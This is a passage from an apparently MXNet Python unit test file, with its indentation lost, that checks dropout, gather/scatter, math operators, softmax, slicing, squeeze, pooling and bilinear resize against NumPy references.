x = mx.sym.var('data')
y = mx.sym.Dropout(x, p=ratio, cudnn_off=cudnn_off)
exe = y.simple_bind(ctx=default_context(), data=shape)
if ratio == 1:
max_value = float('nan')
else:
max_value = 1 if ratio == 0 else 1/ratio
if ratio == 1:
min_value = float('nan')
else:
min_value = 1 if ratio == 0 else 0
exe.arg_arrays[0][:] = 1
exe.forward(is_train=True)
if not math.isnan(max_value):
assert exe.outputs[0].asnumpy().max() > 0
else:
assert math.isnan(exe.outputs[0].asnumpy().max())
if not math.isnan(min_value):
assert exe.outputs[0].asnumpy().min() == min_value
else:
assert math.isnan(exe.outputs[0].asnumpy().min())
check_correctness(exe, exe.arg_arrays[0].asnumpy(), ratio)
if ratio == 0.5:
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
exe.forward(is_train=False)
assert (exe.outputs[0].asnumpy() == exe.arg_arrays[0].asnumpy()).all()
exe.backward([mx.nd.ones(shape)], is_train=False)
assert (exe.grad_arrays[0].asnumpy() == exe.arg_arrays[0].asnumpy()).all()
# test permanent dropout
x = mx.sym.var('data')
y = mx.sym.Dropout(x, p=ratio, mode='always', cudnn_off=cudnn_off)
exe = y.simple_bind(ctx=default_context(), data=shape)
exe.arg_arrays[0][:] = 1
exe.forward(is_train=True)
assert exe.outputs[0].asnumpy().max() == max_value
assert exe.outputs[0].asnumpy().min() == min_value
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
exe.forward(is_train=False)
assert exe.outputs[0].asnumpy().max() == max_value
assert exe.outputs[0].asnumpy().min() == min_value
exe.backward([mx.nd.ones(shape)], is_train=False)
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
def get_slice(x, axis, idx):
ix = ()
for i in range(x.ndim):
if i == axis:
ix += (idx,)
else:
ix += (slice(None, None, None),)
return x[ix]
def check_dropout_axes(ratio, shape, axes, cudnn_off=True):
compactshape = list(shape)
for axis in axes:
compactshape[axis] = 1
compactx = mx.random.uniform(shape=tuple(compactshape))
broadcastx = compactx.broadcast_to(shape)
dropouty = mx.nd.Dropout(broadcastx, p=ratio, axes=axes, cudnn_off=cudnn_off)
for axis in axes:
target = get_slice(dropouty, axis, 0).asnumpy()
for i in range(1, shape[axis]):
assert(get_slice(dropouty, axis, i).asnumpy() == target).all()
def check_passthrough(ratio, shape, cudnn_off=True):
# test inference_mode forward and then backward
a = mx.random.uniform(shape=shape)
a.attach_grad()
with mx.autograd.record(train_mode=False):
b = mx.nd.Dropout(a, ratio, cudnn_off=cudnn_off) # dropout acts as identity
b.backward()
assert_almost_equal(a.grad.asnumpy(), mx.nd.ones_like(b).asnumpy())
shape = (100, 100)
check_dropout_ratio(0.5, shape)
check_dropout_ratio(0.0, shape)
check_dropout_ratio(1.0, shape)
check_dropout_ratio(0.75, shape)
check_dropout_ratio(0.25, shape)
check_dropout_ratio(0.5, shape, cudnn_off=False)
check_dropout_ratio(0.0, shape, cudnn_off=False)
check_dropout_ratio(1.0, shape, cudnn_off=False)
check_dropout_ratio(0.75, shape, cudnn_off=False)
check_dropout_ratio(0.25, shape, cudnn_off=False)
check_passthrough(0.5, shape)
check_passthrough(0.0, shape)
check_passthrough(1.0, shape)
check_passthrough(0.5, shape, cudnn_off=False)
check_passthrough(0.0, shape, cudnn_off=False)
check_passthrough(1.0, shape, cudnn_off=False)
nshape = (10, 10, 10, 10)
with mx.autograd.train_mode():
check_dropout_axes(0.25, nshape, axes = (0,))
check_dropout_axes(0.25, nshape, axes = (1,))
check_dropout_axes(0.25, nshape, axes = (2,))
check_dropout_axes(0.25, nshape, axes = (3,))
check_dropout_axes(0.25, nshape, axes = (0, 1))
check_dropout_axes(0.25, nshape, axes = (0, 2))
check_dropout_axes(0.25, nshape, axes = (0, 3))
check_dropout_axes(0.25, nshape, axes = (1, 2))
check_dropout_axes(0.25, nshape, axes = (1, 3))
check_dropout_axes(0.25, nshape, axes = (2, 3))
check_dropout_axes(0.25, nshape, axes = (0, 1, 2))
check_dropout_axes(0.25, nshape, axes = (0, 2, 3))
check_dropout_axes(0.25, nshape, axes = (1, 2, 3))
check_dropout_axes(0.25, nshape, axes = (0,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (2,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (3,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 1), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 2), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1, 2), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (2, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 1, 2), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 2, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1, 2, 3), cudnn_off=False)
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/11290")
@with_seed()
def test_scatter_gather_nd():
def check(data, idx):
data.attach_grad()
with mx.autograd.record():
y = mx.nd.gather_nd(data, idx)
y.backward(y)
npidx = tuple(i.asnumpy() for i in idx)
assert (data.asnumpy()[npidx] == y.asnumpy()).all()
npdata = np.zeros_like(data.asnumpy())
npdata[npidx] = y.asnumpy()
assert (npdata == data.grad.asnumpy()).all()
assert (mx.nd._internal._backward_gather_nd(y, idx, shape=data.shape).asnumpy() == data.grad.asnumpy()).all()
for dtype in ['int32', 'int64', 'float16', 'float32', 'float64']:
data = mx.nd.arange(360, dtype=dtype).reshape((3,4,5,6))
idx = mx.nd.array([[1,1,2], [3, 3, 0], [3,2,1]], dtype='int32')
check(data, idx)
idx = mx.nd.array([[1,1,2], [3,3,0], [3,2,1], [5,2,4]], dtype='int32')
check(data, idx)
data = mx.nd.array([2, 3, 0], dtype=dtype)
idx = mx.nd.array([[1, 1, 0], [0, 1, 0]], dtype='int32')
assert (mx.nd.scatter_nd(data, idx, shape=(2, 2)).asnumpy() == [[0, 0], [2, 3]]).all()
data = mx.nd.array([2, 3, 0], dtype=dtype)
idx = mx.nd.array([[1, 1, 0], [1, 1, 0]], dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(2, 2)).asnumpy() == [[0, 0], [0, 5]]).all()
data_npy = np.random.randint(0, 10, (100,))
data = mx.nd.array(data_npy, dtype=dtype)
idx = mx.nd.zeros(shape=(1, 100), dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(1,)).asscalar() == data_npy.sum())
if dtype == 'int64':
data = mx.nd.array([2123162361283621, -31231236374787,
-112372937128970, -1378278798172378], dtype=dtype)
idx = mx.nd.array([[0, 0, 0, 0]], dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(1,)).asscalar() == data.asnumpy().sum())
@with_seed()
def test_gather_nd_check_bound():
def _test_gather_nd_exception(data, indices):
output = mx.nd.gather_nd(data, indices).asnumpy()
# check if indices is out of bound
data = mx.nd.array([[0, 1, 2], [3, 4, 5]])
indices1 = mx.nd.array([[0, 1, 0], [0, 1, 3]])
indices2 = mx.nd.array([[0, 1, 0], [0, 1, -5]])
assertRaises(IndexError, _test_gather_nd_exception, data, indices1)
# IndexError: index 3 is out of bounds for axis 1 with size 3
assertRaises(IndexError, _test_gather_nd_exception, data, indices2)
# IndexError: index -5 is out of bounds for axis 1 with size 3
# check if the negative indices are wrapped correctly
indices1 = mx.nd.array([[0, 1, -1], [0, 1, -2]])
indices2 = mx.nd.array([[0, 1, 1], [0, 1, 1]])
data1 = mx.nd.gather_nd(data, indices1)
data2 = mx.nd.gather_nd(data, indices2)
assert_almost_equal(data1, data2, rtol=1e-5, atol=1e-5)
def compare_forw_backw_unary_op(
name, forward_mxnet_call, forward_numpy_call,
backward_numpy_call, shape, input_low, input_high, rtol, atol,
dtype=np.float32):
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol,
atol=atol, dtype=dtype)
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol, atol=atol, dtype=dtype)
op_name = 'unary_op={}, dtype={}'.format(name, dtype)
data = mx.symbol.Variable(op_name + '_data', dtype=dtype)
# Comparison: Forward expression
data_np = np.random.uniform(input_low, input_high, shape).astype(dtype)
res_np = forward_numpy_call(data_np)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data), mx.sym.zeros_like(data),
name=op_name)
check_fw(op_ex, [data_np], [res_np])
# Comparison: Backward expression
res_grad = np.random.uniform(-2.0, 2.0, shape).astype(dtype)
data_grad = backward_numpy_call(data_np) * res_grad
check_bw(op_ex, [data_np], [res_grad], [data_grad])
def finite_diff_unary_op(
name, forward_mxnet_call, shape, input_low, input_high, rtol, atol,
num_eps):
# Finite difference tests are done in float64
dtype = np.float64
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol,
atol=atol, dtype=dtype)
data_np = np.random.uniform(input_low, input_high, shape).astype(dtype)
data = mx.symbol.Variable('data', dtype=dtype)
op_name = 'unary_op={}, dtype={}'.format(name, dtype)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data), mx.sym.zeros_like(data),
name=op_name)
check_grad(op_ex, [data_np])
def np_smooth_l1(x, sigma):
issq = 1. / sigma / sigma
absx = np.abs(x)
temp = x * sigma
return np.where(absx < issq, 0.5 * (temp ** 2), absx - 0.5 * issq)
def np_smooth_l1_grad(x, sigma):
ssq = sigma * sigma
return np.where(np.abs(x) < 1. / ssq, x * ssq, np.sign(x))
# Tests for unary operators (basic mathematical functions):
# - Forward: Comparison to NumPy (several dtype)
# - Backward: Comparison to NumPy (several dtype)
# - Finite difference tests (only dtype = float64)
# Seed set because the test is not robust enough to operate on random data
@with_seed(192837465)
def test_unary_math_operators():
have_scipy = True
try:
from scipy import special as scipy_special
except:
print("Could not import scipy. Skipping unit tests for special functions")
have_scipy = False
shape=(9, 10)
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
rtol_less_l = [1e-6, 1e-5, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
atol_less_l = [1e-6, 1e-5, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
unary_ops = {
'arccos' : [lambda x: mx.sym.arccos(x),
lambda x: np.arccos(x),
lambda x: -1. / np.sqrt(1. - x ** 2.),
-0.95, 0.95],
'arccosh': [lambda x: mx.sym.arccosh(x),
lambda x: np.arccosh(x),
lambda x: 1. / np.sqrt(x ** 2 - 1.),
1.05, 10.0],
'arcsin': [lambda x: mx.sym.arcsin(x),
lambda x: np.arcsin(x),
lambda x: 1. / np.sqrt(1. - x ** 2),
-0.95, 0.95],
'arcsinh': [lambda x: mx.sym.arcsinh(x),
lambda x: np.arcsinh(x),
lambda x: 1. / np.sqrt(x**2 + 1.),
-5.0, 5.0],
'arctan': [lambda x: mx.sym.arctan(x),
lambda x: np.arctan(x),
lambda x: 1. / (x ** 2. + 1.),
-5.0, 5.0],
'arctanh': [lambda x: mx.sym.arctanh(x),
lambda x: np.arctanh(x),
lambda x: 1. / (1. - x ** 2),
-0.95, 0.95],
'cbrt': [lambda x: mx.sym.cbrt(x),
lambda x: np.cbrt(x),
lambda x: 1. / (3. * np.cbrt(x) ** 2),
-10.0, 10.0],
'cos': [lambda x: mx.sym.cos(x),
lambda x: np.cos(x),
lambda x: -np.sin(x),
-5.0, 5.0],
'cosh': [lambda x: mx.sym.cosh(x),
lambda x: np.cosh(x),
lambda x: np.sinh(x),
-2.0, 2.0],
'exp': [lambda x: mx.sym.exp(x),
lambda x: np.exp(x),
lambda x: np.exp(x),
-4.0, 4.0],
'expm1': [lambda x: mx.sym.expm1(x),
lambda x: np.expm1(x),
lambda x: np.exp(x),
-0.1, 0.1],
'log': [lambda x: mx.sym.log(x),
lambda x: np.log(x),
lambda x: 1. / x,
0.01, 100.0],
'log10': [lambda x: mx.sym.log10(x),
lambda x: np.log10(x),
lambda x: 1. / (x * np.log(10.)),
0.01, 100.0],
'log2': [lambda x: mx.sym.log2(x),
lambda x: np.log2(x),
lambda x: 1. / (x * np.log(2.)),
0.01, 100.0],
'log1p': [lambda x: mx.sym.log1p(x),
lambda x: np.log1p(x),
lambda x: 1. / (1. + x),
-0.1, 0.1],
'rcbrt': [lambda x: mx.sym.rcbrt(x),
lambda x: 1. / np.cbrt(x),
lambda x: -1. / (3. * x * np.cbrt(x)),
0.01, 100.0],
'reciprocal': [lambda x: mx.sym.reciprocal(x),
lambda x: 1. / x,
lambda x: -1. / (x ** 2),
0.01, 100.0],
'relu': [lambda x: mx.sym.relu(x),
lambda x: np.maximum(x, 0.),
lambda x: 1. * (x > 0.),
-5.0, 5.0],
'rsqrt': [lambda x: mx.sym.rsqrt(x),
lambda x: 1. / np.sqrt(x),
lambda x: -0.5 / (x * np.sqrt(x)),
0.01, 100.0],
'sigmoid': [lambda x: mx.sym.sigmoid(x),
lambda x: 1. / (np.exp(-x) + 1.),
lambda x: 1. / (np.exp(-x) + 1.) / (np.exp(x) + 1.),
-3.0, 3.0],
'softsign': [lambda x: mx.sym.softsign(x),
lambda x: x / (1. + np.abs(x)),
lambda x: 1. / np.square(1. + np.abs(x)),
-3.0, 3.0],
'sin': [lambda x: mx.sym.sin(x),
lambda x: np.sin(x),
lambda x: np.cos(x),
-5.0, 5.0],
'sinh': [lambda x: mx.sym.sinh(x),
lambda x: np.sinh(x),
lambda x: np.cosh(x),
-2.0, 2.0],
'sqrt': [lambda x: mx.sym.sqrt(x),
lambda x: np.sqrt(x),
lambda x: 0.5 / np.sqrt(x),
0.01, 100.0],
'tan': [lambda x: mx.sym.tan(x),
lambda x: np.tan(x),
lambda x: np.tan(x) ** 2 + 1.,
-1.5, 1.5],
'tanh': [lambda x: mx.sym.tanh(x),
lambda x: np.tanh(x),
lambda x: 1. - np.tanh(x) ** 2,
-4.0, 4.0],
'smooth_l1_sig1': [lambda x: mx.sym.smooth_l1(x, scalar=1.),
lambda x: np_smooth_l1(x, 1.),
lambda x: np_smooth_l1_grad(x, 1.),
-2.0, 2.0],
'smooth_l1_sig_default': [lambda x: mx.sym.smooth_l1(x),
lambda x: np_smooth_l1(x, 1.),
lambda x: np_smooth_l1_grad(x, 1.),
-2.0, 2.0],
'smooth_l1_sig2': [lambda x: mx.sym.smooth_l1(x, scalar=2.),
lambda x: np_smooth_l1(x, 2.),
lambda x: np_smooth_l1_grad(x, 2.),
-1.0, 1.0]
}
if have_scipy:
unary_ops['gamma'] = [lambda x: mx.sym.gamma(x),
lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x),
0.01, 5.0]
unary_ops['gammaln'] = [lambda x: mx.sym.gammaln(x),
lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x),
0.01, 20.0]
# Loop over operators
for name, op in unary_ops.items():
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
if name == 'gammaln' or name == 'gamma':
rtol = rtol_less_l[ind]
atol = atol_less_l[ind]
else:
rtol = rtol_l[ind]
atol = atol_l[ind]
compare_forw_backw_unary_op(
name, op[0], op[1], op[2], shape, op[3], op[4], rtol, atol,
dtype)
# Finite difference testing
finite_diff_unary_op(
name, op[0], shape, op[3], op[4], rtol_fd, atol_fd, num_eps)
def compare_forw_backw_binary_op(
name, forward_mxnet_call, forward_numpy_call,
backward1_numpy_call, backward2_numpy_call, shape, input1_low,
input1_high, input2_low, input2_high, rtol, atol, dtype=np.float32):
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol,
atol=atol, dtype=dtype)
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol, atol=atol, dtype=dtype)
op_name = 'binary_op={}, dtype={}'.format(name, dtype)
data1 = mx.symbol.Variable(op_name + '_data1', dtype=dtype)
data2 = mx.symbol.Variable(op_name + '_data2', dtype=dtype)
# Comparison: Forward expression
data1_np = np.random.uniform(input1_low, input1_high, shape).astype(dtype)
data2_np = np.random.uniform(input2_low, input2_high, shape).astype(dtype)
res_np = forward_numpy_call(data1_np, data2_np)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data1, data2), mx.sym.zeros_like(data1),
name=op_name)
check_fw(op_ex, [data1_np, data2_np], [res_np])
# Comparison: Backward expression
res_grad = np.random.uniform(-2.0, 2.0, shape).astype(dtype)
data1_grad = backward1_numpy_call(data1_np, data2_np) * res_grad
data2_grad = backward2_numpy_call(data1_np, data2_np) * res_grad
check_bw(op_ex, [data1_np, data2_np], [res_grad], [data1_grad, data2_grad])
def finite_diff_binary_op(
name, forward_mxnet_call, shape, input1_low, input1_high, input2_low,
input2_high, rtol, atol, num_eps):
# Finite difference tests are done in float64
dtype = np.float64
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol,
atol=atol, dtype=dtype)
data1_np = np.random.uniform(input1_low, input1_high, shape).astype(dtype)
data2_np = np.random.uniform(input2_low, input2_high, shape).astype(dtype)
data1 = mx.symbol.Variable('data1', dtype=dtype)
data2 = mx.symbol.Variable('data2', dtype=dtype)
op_name = 'binary_op={}, dtype={}'.format(name, dtype)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data1, data2), mx.sym.zeros_like(data1),
name=op_name)
check_grad(op_ex, [data1_np, data2_np])
# Tests for unary operators (basic mathematical functions):
# - Forward: Comparison to NumPy (several dtype)
# - Backward: Comparison to NumPy (several dtype)
# - Finite difference tests (only dtype = float64)
@with_seed()
def test_binary_math_operators():
shape=(9, 10)
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
binary_ops = {
'hypot' : [lambda x, y: mx.sym.hypot(x, y),
lambda x, y: np.hypot(x, y),
lambda x, y: x / np.hypot(x, y),
lambda x, y: y / np.hypot(x, y),
-5.0, 5.0, -5.0, 5.0],
'pow': [lambda x, y: mx.sym.pow(x, y),
lambda x, y: np.power(x, y),
lambda x, y: np.power(x, y - 1.) * y,
lambda x, y: np.power(x, y) * np.log(x),
0.2, 5.0, -4.0, 4.0],
'power': [lambda x, y: mx.sym.power(x, y),
lambda x, y: np.power(x, y),
lambda x, y: np.power(x, y - 1.) * y,
lambda x, y: np.power(x, y) * np.log(x),
0.2, 5.0, -4.0, 4.0]
}
# Loop over operators
for name, op in binary_ops.items():
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
compare_forw_backw_binary_op(
name, op[0], op[1], op[2], op[3], shape, op[4], op[5], op[6],
op[7], rtol_l[ind], atol_l[ind], dtype)
# Finite difference testing
finite_diff_binary_op(
name, op[0], shape, op[4], op[5], op[6], op[7], rtol_fd, atol_fd,
num_eps)
@with_seed()
def test_softmax():
check_softmax_with_shape((3, 4), default_context(), preserve_shape=False)
check_softmax_with_shape((3, 4), default_context(), preserve_shape=True)
check_softmax_with_shape((3, 4, 2), default_context(), preserve_shape=True)
check_softmax_grad(default_context())
check_smoothed_softmax_grad(default_context())
@with_seed()
def test_softmax_output_normalization():
def _softmaxoutput_normalization(multi_output, use_ignore, normalization):
grad_scale = np.random.random()
batch_size = 8
num_labels = 6
H, W = 3, 3
ignore_label = np.random.randint(0, num_labels) if use_ignore else -1
if multi_output:
data_shape = (batch_size, num_labels, H, W)
label_shape = (batch_size, H, W)
else:
data_shape = (batch_size, num_labels)
label_shape = (batch_size, )
data = mx.nd.random.uniform(-1, 1, shape=data_shape)
label = mx.nd.random.randint(
0, num_labels, shape=label_shape).astype('float32')
data.attach_grad()
kwargs = dict(grad_scale=grad_scale,
normalization=normalization, multi_output=multi_output)
if use_ignore:
kwargs.update(use_ignore=True, ignore_label=ignore_label)
with mx.autograd.record():
out = mx.nd.SoftmaxOutput(data=data, label=label, **kwargs)
out.backward(mx.nd.ones_like(data))
exp_data = mx.nd.exp(data)
softmax_data = exp_data / exp_data.sum(1, keepdims=True)
argmax_data = mx.nd.argmax(data, axis=1)
assert_almost_equal(out.asnumpy(), softmax_data.asnumpy())
one_hot_label = mx.nd.one_hot(label, num_labels)
if multi_output:
one_hot_label = one_hot_label.transpose((0, 3, 1, 2))
data_grad = softmax_data - one_hot_label
if use_ignore:
if multi_output:
data_grad *= (label !=
ignore_label).reshape((batch_size, 1, H, W))
else:
data_grad *= (label != ignore_label).reshape((batch_size, 1))
valid_cnt = 1
if normalization == 'batch':
valid_cnt = batch_size
elif normalization == 'valid':
valid_cnt = mx.nd.maximum(1, (label != ignore_label).sum())
scale = grad_scale / valid_cnt
if multi_output:
if normalization != 'valid':
scale /= H * W
data_grad *= scale
assert_almost_equal(data.grad.asnumpy(), data_grad.asnumpy())
for multi_output in [False, True]:
for use_ignore in [False, True]:
for normalization in ['null', 'batch', 'valid']:
_softmaxoutput_normalization(
multi_output, use_ignore, normalization)
@with_seed()
def test_slice():
def test_slice_forward_backward(a, index):
a_np = a.asnumpy()
begin = []
end = []
step = []
for slice_i in index:
begin.append(slice_i.start)
end.append(slice_i.stop)
step.append(slice_i.step)
b = mx.nd.slice(a, begin=begin, end=end, step=step)
b_np = a_np[index]
assert same(b.asnumpy(), b_np)
data = mx.sym.Variable('data')
slice_sym = mx.sym.slice(data, begin=begin, end=end, step=step)
expected_in_grad = np.zeros_like(a_np)
expected_in_grad[index] = b_np
check_symbolic_backward(slice_sym, [a_np], [b_np], [expected_in_grad])
shape = (16, 14, 17, 20)
arr = mx.nd.arange(np.prod(shape)).reshape(shape=shape)
index_list = [(slice(None),), (slice(None), slice(None)), (slice(1, 10),), (slice(1, 10), slice(3, 9)),
(slice(1, 10), slice(2, 5), slice(3, 6), slice(7, 10)),
(slice(1, 10, 2), slice(2, 9, 3), slice(3, 6, 5), slice(7, 10, 2)),
(slice(None, None, -1), slice(None, None, -1), slice(None, None, -1)),
(slice(10, 0, -2), slice(5, 2, -1), slice(7, None, 3), slice(None, 12, 4))]
for index in index_list:
test_slice_forward_backward(arr, index)
# check numeric gradient
in_data = np.arange(36).reshape(2, 2, 3, 3)
data = mx.sym.Variable('data')
slice_sym = mx.sym.slice(data, begin=[0, None], end=[1, None], step=[2, -1])
check_numeric_gradient(slice_sym, [in_data])
def test_slice_partial_infer():
def check_slice_partial_infer(data, begin, end, step, expected_out_shape):
out = mx.sym.slice(data, begin=begin, end=end, step=step)
assert (out.infer_shape_partial()[1][0] == expected_out_shape), out.infer_shape_partial()[1]
def check_slice_axis_partial_infer(data, axis, begin, end, expected_out_shape):
out = mx.sym.slice_axis(data, axis=axis, begin=begin, end=end)
assert (out.infer_shape_partial()[1][0] == expected_out_shape), out.infer_shape_partial()[1]
var1 = mx.sym.var(name="data", shape=(0, 20))
check_slice_partial_infer(var1, (None, None), (None, 10), [], (0, 10))
check_slice_partial_infer(var1, (None, None), (None, 10), (None, 2), (0, 5))
check_slice_partial_infer(var1, (None, 3), (None, 10), [], (0, 7))
check_slice_partial_infer(var1, (None, 3), (5, 10), [], (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), [], (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (None, 1), (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (3, 3), (0, 3))
var1 = mx.sym.var(name="data", shape=(10, 0))
check_slice_axis_partial_infer(var1, 0, 0, 5, (5, 0))
check_slice_axis_partial_infer(var1, 1, 0, 5, (10, 0))
with mx.np_shape():
var1 = mx.sym.var(name="data", shape=(-1, 20))
check_slice_partial_infer(var1, (None, None), (None, 10), [], (-1, 10))
check_slice_partial_infer(var1, (None, None), (None, 10), (None, 2), (-1, 5))
check_slice_partial_infer(var1, (None, 3), (None, 10), [], (-1, 7))
check_slice_partial_infer(var1, (None, 3), (5, 10), [], (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), [], (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (None, 1), (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (3, 3), (-1, 3))
var1 = mx.sym.var(name='data', shape=(10, -1))
check_slice_axis_partial_infer(var1, 0, 0, 5, (5, -1))
check_slice_axis_partial_infer(var1, 1, 0, 5, (10, -1))
@with_seed()
def test_float16_min_max():
"""Test for issue: https://github.com/apache/incubator-mxnet/issues/9007"""
a = mx.nd.array([np.finfo('float16').min, np.finfo('float16').max], dtype='float16')
assert a.dtype == np.float16
assert np.finfo('float16').min == mx.nd.min(a).asscalar()
assert np.finfo('float16').max == mx.nd.max(a).asscalar()
@with_seed()
@mx.use_np_shape
def test_zero_size_min_max():
def min():
a = mx.nd.zeros(shape=(5, 0))
a.min()
def max():
a = mx.nd.zeros(shape=(5, 0))
a.max()
assert_raises(MXNetError, min)
assert_raises(MXNetError, max)
@with_seed()
def test_squeeze_op():
def check_squeeze_op(shape, axis=None):
data = mx.nd.random.uniform(low=-10.0, high=10.0, shape=shape)
if axis is None:
out = mx.nd.squeeze(data).asnumpy()
out_expected = np.squeeze(data.asnumpy())
else:
out = mx.nd.squeeze(data, axis=axis).asnumpy()
out_expected = np.squeeze(data.asnumpy(), axis=axis)
if out.shape == (1,): # as an exception (1, 1, 1) will be squeezed to (1,)
out_expected = np.squeeze(data.asnumpy(), axis=tuple([i for i in range(1, len(shape))]))
assert same(out, out_expected)
# check forward
check_squeeze_op((1, 5, 1, 3, 1), 0)
check_squeeze_op((1, 5, 1, 3, 1), 2)
check_squeeze_op((1, 5, 1, 3, 1), 4)
check_squeeze_op((1, 5, 1, 3, 1), (0, 4))
check_squeeze_op((1, 5, 1, 3, 1), (0, 2, 4))
check_squeeze_op((1, 5, 1, 3, 1))
check_squeeze_op((1, 1, 1, 1))
# check gradient
data = mx.symbol.Variable('data')
shape = (1, 2, 1, 3, 1)
data_tmp = np.ones(shape)
test = mx.sym.squeeze(data)
check_numeric_gradient(test, [data_tmp])
test = mx.sym.squeeze(data, axis=2)
check_numeric_gradient(test, [data_tmp])
test = mx.sym.squeeze(data, axis=(2, 4))
check_numeric_gradient(test, [data_tmp])
@with_seed()
def test_adaptive_avg_pool_op():
def py_adaptive_avg_pool(x, height, width):
# 2D per frame adaptive avg pool
def adaptive_avg_pool_frame(x, y):
isizeH, isizeW = x.shape
osizeH, osizeW = y.shape
for oh in range(osizeH):
istartH = int(np.floor(1.0 * (oh * isizeH) / osizeH))
iendH = int(np.ceil(1.0 * (oh + 1) * isizeH / osizeH))
kH = iendH - istartH
for ow in range(osizeW):
istartW = int(np.floor(1.0 * (ow * isizeW) / osizeW))
iendW = int(np.ceil(1.0 * (ow + 1) * isizeW / osizeW))
kW = iendW - istartW
xsum = 0
for ih in range(kH):
for iw in range(kW):
xsum += x[istartH+ih][istartW+iw]
y[oh][ow] = xsum / kH / kW
B,C,_,_ = x.shape
y = np.empty([B,C,height, width], dtype=x.dtype)
for b in range(B):
for c in range(C):
adaptive_avg_pool_frame(x[b][c], y[b][c])
return y
def check_adaptive_avg_pool_op(shape, output_height, output_width=None):
x = mx.nd.random.uniform(shape=shape)
if output_width is None:
y = mx.nd.contrib.AdaptiveAvgPooling2D(x, output_size=output_height)
npy = py_adaptive_avg_pool(x.asnumpy(), output_height, output_height)
else:
y = mx.nd.contrib.AdaptiveAvgPooling2D(x, output_size=(output_height, output_width))
npy = py_adaptive_avg_pool(x.asnumpy(), output_height, output_width)
assert_almost_equal(y.asnumpy(), npy)
shape = (2, 2, 10, 10)
for i in range(1, 11):
check_adaptive_avg_pool_op(shape, i)
for j in range(1, 11):
check_adaptive_avg_pool_op(shape, i, j)
@with_seed()
def test_bilinear_resize_op():
def py_bilinear_resize(x, outputHeight, outputWidth):
batch, channel, inputHeight, inputWidth = x.shape
if outputHeight == inputHeight and outputWidth == inputWidth:
return x
y = np.empty([batch, channel, outputHeight, outputWidth])
rheight = 1.0 * (inputHeight - 1) / (outputHeight - 1) if outputHeight > 1 else 0.0
rwidth = 1.0 * (inputWidth - 1) / (outputWidth - 1) if outputWidth > 1 else 0.0
for h2 in range(outputHeight):
h1r = 1.0 * h2 * rheight
h1 = int(np.floor(h1r))
h1lambda = h1r - h1
h1p = 1 if h1 < (inputHeight - 1) else 0
for w2 in range(outputWidth):
w1r = 1.0 * w2 * rwidth
w1 = int(np.floor(w1r))
w1lambda = w1r - w1
w1p = 1 if w1 < (inputWidth - 1) else 0
for b in range(batch):
for c in range(channel):
y[b][c][h2][w2] = (1-h1lambda)*((1-w1lambda)*x[b][c][h1][w1] + \
w1lambda*x[b][c][h1][w1+w1p]) + \
h1lambda*((1-w1lambda)*x[b][c][h1+h1p][w1] + \
w1lambda*x[b][c][h1+h1p][w1+w1p])
return y
def py_bilinear_resize_backward(x, incoming_grads, mode='size'):
data1 = np.zeros_like(x)
data2 = incoming_grads
batchsize = data1.shape[0]
channels = data1.shape[1]
height1 = data1.shape[2]
width1 = data1.shape[3]
height2 = data2.shape[2]
width2 = data2.shape[3]
rheight = float(height1 - 1) / (height2 - 1) if (height2 > 1) else 0
rwidth = float(width1 - 1) / (width2 - 1) if (width2 > 1) else 0
# special case: just copy
if height1 == height2 and width1 == width2:
data1 += data2
return [data1]
for h2 in range(0, height2):
for w2 in range(0, width2):
h1r = rheight * h2
h1 = int(h1r)
h1p = 1 if (h1 < height1 - 1) else 0
